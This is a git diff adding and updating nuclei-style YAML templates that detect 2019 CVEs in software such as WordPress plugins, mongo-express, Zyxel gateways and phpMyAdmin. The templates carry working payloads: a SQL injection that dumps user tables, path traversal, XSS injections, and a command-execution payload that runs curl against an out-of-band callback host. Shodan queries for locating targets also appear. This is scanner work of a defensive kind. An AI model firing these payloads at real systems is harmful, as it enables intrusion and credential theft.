diff --git a/cves/2019/CVE-2019-10692.yaml b/cves/2019/CVE-2019-10692.yaml
new file mode 100644
index 0000000000..0b53ec3b6d
--- /dev/null
+++ b/cves/2019/CVE-2019-10692.yaml
@@ -0,0 +1,46 @@
+id: CVE-2019-10692
+
+info:
+  name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection
+  author: pussycat0x
+  severity: critical
+  description: |
+    In the wp-google-maps plugin before 7.11.18 for WordPress,
+    includes/class.rest-api.php in the REST API does not sanitize field names
+    before a SELECT statement.
+  reference:
+    - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10692
+    - https://wordpress.org/plugins/wp-google-maps/#developers
+    - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2019-10692
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"user_login"'
+          - '"user_pass"'
+          - '"user_nicename"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2019/CVE-2019-10717.yaml b/cves/2019/CVE-2019-10717.yaml
new file mode 100644
index 0000000000..39980665a1
--- /dev/null
+++ b/cves/2019/CVE-2019-10717.yaml
@@ -0,0 +1,43 @@
+id: CVE-2019-10717
+
+info:
+  name: BlogEngine.NET 3.3.7.0 - Local File Inclusion
+  author: arafatansari
+  severity: high
+  description: |
+    BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
+  reference:
+    - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
+    - https://github.com/rxtur/BlogEngine.NET/commits/master
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10717
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
+    cvss-score: 7.1
+    cve-id: CVE-2019-10717
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: http.html:"Blogengine.net"
+    verified: "true"
+  tags: cve,cve2019,blogengine,lfi,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/cves/2019/CVE-2019-10758.yaml b/cves/2019/CVE-2019-10758.yaml
index 42ab4c4e78..d940f888fa 100644
--- a/cves/2019/CVE-2019-10758.yaml
+++ b/cves/2019/CVE-2019-10758.yaml
@@ -8,14 +8,15 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
     - https://nvd.nist.gov/vuln/detail/CVE-2019-10758
+    - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215
+  remediation: Upgrade mongo-express to version 0.54.0 or higher.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.9
     cve-id: CVE-2019-10758
-  remediation: Upgrade mongo-express to version 0.54.0 or higher.
   metadata:
     shodan-query: http.title:"Mongo Express"
-  tags: cve,cve2019,mongo,mongo-express
+  tags: vulhub,cve,cve2019,mongo,mongo-express,kev
 
 requests:
   - raw:
@@ -25,7 +26,7 @@ requests:
         Authorization: Basic YWRtaW46cGFzcw==
         Content-Type: application/x-www-form-urlencoded
 
-        document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
+        document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")
     matchers:
       - type: word
         part: interactsh_protocol  # Confirms the HTTP Interaction
diff --git a/cves/2019/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml
index ac509dab1a..e9ed33fc6c 100644
--- a/cves/2019/CVE-2019-11013.yaml
+++ b/cves/2019/CVE-2019-11013.yaml
@@ -1,20 +1,21 @@
 id: CVE-2019-11013
 
 info:
-  name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
+  name: Nimble Streamer <=3.5.4-9 - Local File Inclusion
   author: 0x_Akoko
   severity: medium
-  description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that
-    are outside of the restricted directory on the remote server.
+  description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server.
   reference:
     - https://www.exploit-db.com/exploits/47301
+    - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/
+    - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html
     - https://nvd.nist.gov/vuln/detail/CVE-2019-11013
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2019-11013
     cwe-id: CWE-22
-  tags: cve,cve2019,lfi,nimble
+  tags: cve2019,lfi,nimble,edb,packetstorm,cve
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2019/CVE-2019-11248.yaml b/cves/2019/CVE-2019-11248.yaml
index fa75a70eb5..a5875ef6fe 100644
--- a/cves/2019/CVE-2019-11248.yaml
+++ b/cves/2019/CVE-2019-11248.yaml
@@ -1,21 +1,23 @@
 id: CVE-2019-11248
 
 info:
-  name: exposed_pprof
+  name: Debug Endpoint pprof - Exposure Detection
   author: 0xceeb,ritikchaddha
   severity: high
-  description: The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially
-    leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium
-    severity, but not exposed by the default configuration.
+  description: |
+    The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.
   reference:
     - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
     - http://mmcloughlin.com/posts/your-pprof-is-showing
+    - https://github.com/kubernetes/kubernetes/issues/81023
+    - https://groups.google.com/d/msg/kubernetes-security-announce/pKELclHIov8/BEDtRELACQAJ
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-11248
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
     cvss-score: 8.2
     cve-id: CVE-2019-11248
     cwe-id: CWE-862
-  tags: cve,cve2019,debug
+  tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure
 
 requests:
   - method: GET
@@ -31,3 +33,5 @@ requests:
           - "Profile Descriptions"
           - "goroutine profile: total"
         condition: or
+
+# Enhanced by mp on 2022/06/15
diff --git a/cves/2019/CVE-2019-11370.yaml b/cves/2019/CVE-2019-11370.yaml
new file mode 100644
index 0000000000..c2f5e3f80f
--- /dev/null
+++ b/cves/2019/CVE-2019-11370.yaml
@@ -0,0 +1,45 @@
+id: CVE-2019-11370
+
+info:
+  name: Carel pCOWeb <B1.2.4 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field.
+  reference:
+    - https://www.exploit-db.com/exploits/46897
+    - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-11370
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2019-11370
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"pCOWeb"
+    verified: "true"
+  tags: pcoweb,xss,carel,edb,cve,cve2019
+
+requests:
+  - raw:
+      - |
+        POST /config/pw_snmp_done.html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+
+      - |
+        GET /config/pw_snmp.html HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "text/html")'
+          - status_code_2 == 200
+          - contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>')
+        condition: and
+
+# Enhanced by mp on 2022/08/08
diff --git a/cves/2019/CVE-2019-11510.yaml b/cves/2019/CVE-2019-11510.yaml
index 27bf8d926b..3d0c0d8c5d 100644
--- a/cves/2019/CVE-2019-11510.yaml
+++ b/cves/2019/CVE-2019-11510.yaml
@@ -4,18 +4,17 @@ info:
   name: Pulse Connect Secure SSL VPN Arbitrary File Read
   author: organiccrap
   severity: critical
-  description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers
-    to send a specially crafted URI to gain improper access.
+  description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
   reference:
     - https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
     - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-11510
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2019-11510
     cwe-id: CWE-22
-  tags: cve,cve2019,pulsesecure,lfi
+  tags: cve,cve2019,pulsesecure,lfi,kev
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-11580.yaml b/cves/2019/CVE-2019-11580.yaml
index f682c128b5..d1e0ae6c20 100644
--- a/cves/2019/CVE-2019-11580.yaml
+++ b/cves/2019/CVE-2019-11580.yaml
@@ -4,19 +4,18 @@ info:
   name: Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution
   author: dwisiswant0
   severity: critical
-  description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds.    Attackers who can
-    send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable
-    version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before
-    3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
+  description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds.    Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
   reference:
     - https://github.com/jas502n/CVE-2019-11580
     - https://jira.atlassian.com/browse/CWD-5388
     - https://nvd.nist.gov/vuln/detail/CVE-2019-11580
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-11580
-  tags: cve,cve2019,atlassian,rce
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  tags: cve,cve2019,atlassian,rce,kev,cisa
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-11581.yaml b/cves/2019/CVE-2019-11581.yaml
index 3983c871e0..7f3f698e62 100644
--- a/cves/2019/CVE-2019-11581.yaml
+++ b/cves/2019/CVE-2019-11581.yaml
@@ -16,7 +16,9 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2019-11581
     cwe-id: CWE-74
-  tags: cve,cve2019,atlassian,jira,ssti,rce
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  tags: cve,cve2019,atlassian,jira,ssti,rce,kev,cisa
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml
index f18614cd2c..53774ff411 100644
--- a/cves/2019/CVE-2019-11869.yaml
+++ b/cves/2019/CVE-2019-11869.yaml
@@ -1,25 +1,28 @@
 id: CVE-2019-11869
 
 info:
-  name: Yuzo Related Posts plugin XSS
+  name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
   author: ganofins
   severity: medium
   description: |
-    The Yuzo Related Posts plugin before 5.12.94 for WordPress has XSS
+    WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
     because it mistakenly expects that is_admin() verifies that the
     request comes from an admin user (it actually only verifies that the
-    request is for an admin page). An unauthenticated attacker can inject
+    request is for an admin page). An unauthenticated attacker can consequently inject
     a payload into the plugin settings, such as the
     yuzo_related_post_css_and_style setting.
   reference:
     - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
     - https://wpscan.com/vulnerability/9254
+    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
+    - https://wpvulndb.com/vulnerabilities/9254
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-11869
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-11869
     cwe-id: CWE-79
-  tags: cve,cve2019,wordpress,wp-plugin,xss
+  tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss
 
 requests:
   - raw:
@@ -43,4 +46,6 @@ requests:
 
       - type: dsl
         dsl:
-          - "contains(tolower(all_headers_2), 'text/html')"
\ No newline at end of file
+          - "contains(tolower(all_headers_2), 'text/html')"
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml
index 138647b538..1c4b8d9756 100644
--- a/cves/2019/CVE-2019-12276.yaml
+++ b/cves/2019/CVE-2019-12276.yaml
@@ -1,20 +1,24 @@
 id: CVE-2019-12276
 
 info:
-  name: GrandNode 4.40 - Path Traversal
+  name: GrandNode 4.40 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server
-    via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
+  description: |
+    GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.
   reference:
     - https://security401.com/grandnode-path-traversal/
-    - https://www.cvedetails.com/cve/CVE-2019-12276
+    - https://grandnode.com
+    - https://github.com/grandnode/grandnode
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12276
+  remediation: |
+    A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-12276
     cwe-id: CWE-22
-  tags: cve,cve2019,lfi
+  tags: cve,cve2019,lfi,grandnode
 
 requests:
   - method: GET
@@ -33,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/15
diff --git a/cves/2019/CVE-2019-12314.yaml b/cves/2019/CVE-2019-12314.yaml
index 4fc83720a1..1ff737bb36 100644
--- a/cves/2019/CVE-2019-12314.yaml
+++ b/cves/2019/CVE-2019-12314.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2019-12314
     cwe-id: CWE-22
-  tags: cve,cve2019,lfi
+  tags: cve,cve2019,lfi,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml
index 8fae20dc16..3d9f0aa0a7 100644
--- a/cves/2019/CVE-2019-12461.yaml
+++ b/cves/2019/CVE-2019-12461.yaml
@@ -1,13 +1,16 @@
 id: CVE-2019-12461
 
 info:
-  name: WebPort 1.19.1 - Reflected Cross-Site Scripting
+  name: WebPort 1.19.1 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Web Port 1.19.1 allows XSS via the /log type parameter.
+  description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
   reference:
     - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
     - https://webport.se/nedladdningar/
+    - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
+    - https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12461
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -32,4 +35,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/08/08
diff --git a/cves/2019/CVE-2019-12581.yaml b/cves/2019/CVE-2019-12581.yaml
new file mode 100644
index 0000000000..ed07cdfb22
--- /dev/null
+++ b/cves/2019/CVE-2019-12581.yaml
@@ -0,0 +1,45 @@
+id: CVE-2019-12581
+
+info:
+  name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
+  author: n-thumann
+  severity: medium
+  description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
+  reference:
+    - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
+    - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
+    - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12581
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-12581
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.title:"ZyWall"
+  tags: cve,cve2019,zyxel,zywall,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain);</script>"
+          - "Please contact with administrator."
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2019/CVE-2019-12583.yaml b/cves/2019/CVE-2019-12583.yaml
new file mode 100644
index 0000000000..dea4b3429c
--- /dev/null
+++ b/cves/2019/CVE-2019-12583.yaml
@@ -0,0 +1,38 @@
+id: CVE-2019-12583
+
+info:
+  name: Zyxel ZyWall UAG/USG - Account Creation Access
+  author: n-thumann,daffainfo
+  severity: critical
+  description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks.
+  reference:
+    - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
+    - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12583
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 9.1
+    cve-id: CVE-2019-12583
+    cwe-id: CWE-425
+  tags: cve,cve2019,zyxel,zywall
+
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/free_time.cgi"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "free_time_redirect.cgi?u="
+          - "&smsOnly=0"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/01
diff --git a/cves/2019/CVE-2019-12593.yaml b/cves/2019/CVE-2019-12593.yaml
index dcc7b9725c..d7b1fd0f21 100644
--- a/cves/2019/CVE-2019-12593.yaml
+++ b/cves/2019/CVE-2019-12593.yaml
@@ -1,22 +1,23 @@
 id: CVE-2019-12593
 
 info:
-  name: IceWarp <=10.4.4 - Local File Inclusion
+  name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
+  description: |
+    IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
   reference:
     - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-12593
     - http://www.icewarp.com
-    - https://www.icewarp.com/downloads/trial/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12593
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-12593
     cwe-id: CWE-22
   metadata:
-    google-dork: Powered By IceWarp 10.4.4
+    google-query: Powered By IceWarp 10.4.4
+    shodan-query: title:"icewarp"
   tags: cve,cve2019,lfi,icewarp
 
 requests:
@@ -27,10 +28,13 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
         words:
           - "[intl]"
           - "root:x:0"
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml
index 2d60925060..aa2135bff4 100644
--- a/cves/2019/CVE-2019-12616.yaml
+++ b/cves/2019/CVE-2019-12616.yaml
@@ -1,11 +1,10 @@
 id: CVE-2019-12616
 
 info:
-  name: phpMyAdmin CSRF
-  author: Mohammedsaneem,philippedelteil
+  name: phpMyAdmin < 4.9.0 - CSRF
+  author: Mohammedsaneem,philippedelteil,daffainfo
   severity: medium
-  description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's
-    phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
+  description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
   reference:
     - https://www.phpmyadmin.net/security/PMASA-2019-4/
     - https://www.exploit-db.com/exploits/46982
@@ -15,7 +14,7 @@ info:
     cvss-score: 6.5
     cve-id: CVE-2019-12616
     cwe-id: CWE-352
-  tags: cve,cve2019,phpmyadmin,csrf
+  tags: csrf,edb,cve,cve2019,phpmyadmin
 
 requests:
   - method: GET
@@ -24,17 +23,30 @@ requests:
 
     matchers-condition: and
     matchers:
+      - type: status
+        status:
+          - 200
+          - 401  # password protected
+
       - type: word
         words:
           - "phpmyadmin.net"
           - "phpMyAdmin"
         condition: or
 
-      - type: regex
-        regex:
-          - 'v=[1-4]\.[0-8]\.'  # Fix in 4.9.0
+      - type: dsl
+        dsl:
+          - compare_versions(version, '< 4.9.0')
 
-      - type: status
-        status:
-          - 200
-          - 401  # password protected
+    extractors:
+      - type: regex
+        name: version
+        internal: true
+        group: 1
+        regex:
+          - '\?v=([0-9.]+)'
+
+      - type: regex
+        group: 1
+        regex:
+          - '\?v=([0-9.]+)'
diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml
index 7abef6c8a3..69712322c3 100644
--- a/cves/2019/CVE-2019-12725.yaml
+++ b/cves/2019/CVE-2019-12725.yaml
@@ -4,18 +4,18 @@ info:
   name: Zeroshell 3.9.0 Remote Command Execution
   author: dwisiswant0,akincibor
   severity: critical
-  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit
-    this issue by injecting OS commands inside the vulnerable parameters.
+  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
   reference:
     - https://www.zeroshell.org/new-release-and-critical-vulnerability/
     - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
     - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
+    - https://zeroshell.org/blog/
+  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-12725
     cwe-id: CWE-78
-  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
   tags: cve,cve2019,rce,zeroshell
 
 requests:
diff --git a/cves/2019/CVE-2019-12962.yaml b/cves/2019/CVE-2019-12962.yaml
index f7c95b542b..13749b9d0e 100644
--- a/cves/2019/CVE-2019-12962.yaml
+++ b/cves/2019/CVE-2019-12962.yaml
@@ -1,23 +1,25 @@
 id: CVE-2019-12962
 
 info:
-  name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
+  name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting
   author: Clment Cruchet
   severity: medium
   description: |
-    LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
+    LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
   reference:
     - https://www.exploit-db.com/exploits/49669
+    - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/
+    - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html
     - https://nvd.nist.gov/vuln/detail/CVE-2019-12962
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.10
+    cvss-score: 6.1
     cve-id: CVE-2019-12962
     cwe-id: CWE-79
   metadata:
-    verified: true
     shodan-query: http.html:LiveZilla
-  tags: cve,cve2019,livezilla,xss
+    verified: true
+  tags: xss,edb,packetstorm,cve,cve2019,livezilla
 
 
 requests:
@@ -43,3 +45,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/08
diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml
index 111f76fc63..f0d71f1629 100644
--- a/cves/2019/CVE-2019-13101.yaml
+++ b/cves/2019/CVE-2019-13101.yaml
@@ -4,18 +4,18 @@ info:
   name: D-Link DIR-600M Authentication Bypass
   author: Suman_Kar
   severity: critical
-  description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to
-    modify the data fields of the page.
+  description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
   reference:
     - https://github.com/d0x0/D-Link-DIR-600M
     - https://www.exploit-db.com/exploits/47250
     - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
+    - https://us.dlink.com/en/security-advisory
